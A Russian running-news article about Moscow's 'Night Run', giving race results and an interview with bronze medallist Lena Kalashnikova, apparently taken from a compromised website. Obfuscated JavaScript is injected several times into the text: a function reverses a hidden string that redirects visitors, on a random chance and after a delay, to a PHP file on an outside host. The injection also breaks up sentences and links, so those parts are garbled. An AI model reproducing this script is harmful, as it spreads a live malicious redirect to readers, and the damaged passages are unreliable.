Бежать и светить: как прошёл «Ночной забег» в Москве

Тринадцатого июля на московском «Ночном забеге» шесть тысяч спортсменов стартовали после заката, пробежали по ночным набережным и даже внутри стадиона «Лужники». fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru поговорил с бронзовой призёркой забега $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to805rztJ6YjgHUxVipA7NOfOiA1kjwPA» target=»_blank»>Леной Калашниковой и собрал самые яркие снимки главной беговой ночи года!

На «Ночном забеге» первым среди мужчин финишировал Искандер Ядгаров с результатом 30 минут 1 секунда. Вторым к финишу пришёл Иван Панфёров (30:36), третьим — Павел Адышкин (30:43). Из девушек первой стала Алина Ромашова, её результат — 36 минут 15 секунд. Второе место заняла Юлия Конякина (37:17), третье — Елена Калашникова (37:18). Самому молодому участнику забега было 16 лет, самому старшему — 76 лет.

В этом году маршрут забега на последнем километре проходил внутри стадиона «Лужники» — это стало самым ярким впечатлением после преодоления дистанции!

Лена Калашникова

кандидат в мастера спорта по марафону, блогер

— На этом «Ночном забеге» всё сложилось интересно и круто. В день старта многое зависит от погоды, соперников, от того, как ты сам себя повёл на дистанции. Борьба за третье место началась на седьмом или восьмом километре. На этом этапе стали замедляться девушки, которые с самого начала взяли чуть более высокий темп, чем могли выдержать. Я почувствовала вдохновение, когда начала обгонять тех, кто был впереди. Я почувствовала свою силу и, по собственным ощущениям, побежала быстрее. В первую очередь я боролась с собой, а не с другими. 

После отметки девятого километра я увидела, что разрыв между мной и Юлей Конякиной сокращается. Мы бежали к стадиону, Юля приближалась первой. На стадионе под ногами была трава, она слегка гасит скорость. Возможно, мои зверские adidas Adizero Takumi Sen 5 на Юле сработали бы лучше, чем её кроссовки (не посмотрела, какие, предполагаю, что на ней были Adizero Adios). Я чувствовала, что в Adizero Takumi стопа хорошо отрабатывает по траве. В итоге внутри стадиона мы поменялись местами, я вышла вперёд. Мне даже показалось, что я немного оторвалась, но Юля — мастер и, конечно, призовое место так просто не отдала бы. Её финишный рывок оказался мощнее. Мне не обидно, ведь я проиграла девушке, которая сильнее и опытнее. Я счастлива, что мне удалось побороться именно с ней.

Я бежала на личный рекорд. Сомнений, что он будет, у меня не было. За год тренировок с Алексеем Соколовым я сильно выросла. Вопрос был только в том, какие будут цифры. Честно, не думала, что попаду в призы, — в Москве много сильных спортсменок. Даже паспорт с собой не взяла, поэтому юристы, к которым меня повели перед награждением, смотрели на меня подозрительно.

После финиша хотелось обнять всех, кто бежал со мной. Забег — это маленькая жизнь, с кучей историй на одной трассе. И Диму Тарасова (директор забега. — Прим. ред.) хотелось обнять, и Юлю Ушакову, которая вручала нам призы. Я даже не успела переодеться на награждение — всё происходило очень быстро.

Мой главный забег в этом году — марафон в Берлине. Там я хочу выполнить норматив мастера спорта, то есть пробежать быстрее 2 часов 45 минут. До этого будет «СПБ полумарафон» и, возможно, полумарафон «Лужники».

Самые яркие моменты «Ночного забега» в Instagram

В августе бегунов ждут $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/aHR0cHM6Ly9zcGJoYWxmLnJ1bmMucnVuLw==» target=»_blank»>«СПБ полумарафон» в Санкт-Петербурге и полумарафон «Лужники» в Москве. В сентябре состоится главное беговое событие года — Московский марафон, который соберёт десятки тысяч участников со всего мира. В октябре состоятся сразу три забега по пересечённой местности: кросс «Быстрый пёс» для бегунов с собаками, кросс «Лисья гора» в Битцевском парке и «Крылатский трейл».

Статьи по теме

«Ночной забег»: сколько стоит пробежать один из самых необычных стартов сезона

«Беговое сообщество» открывает новый сезон

Открыта регистрация на 23-й Зеленоградский полумарафон

Стоит ли бегать марафоны: плюсы и минусы

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector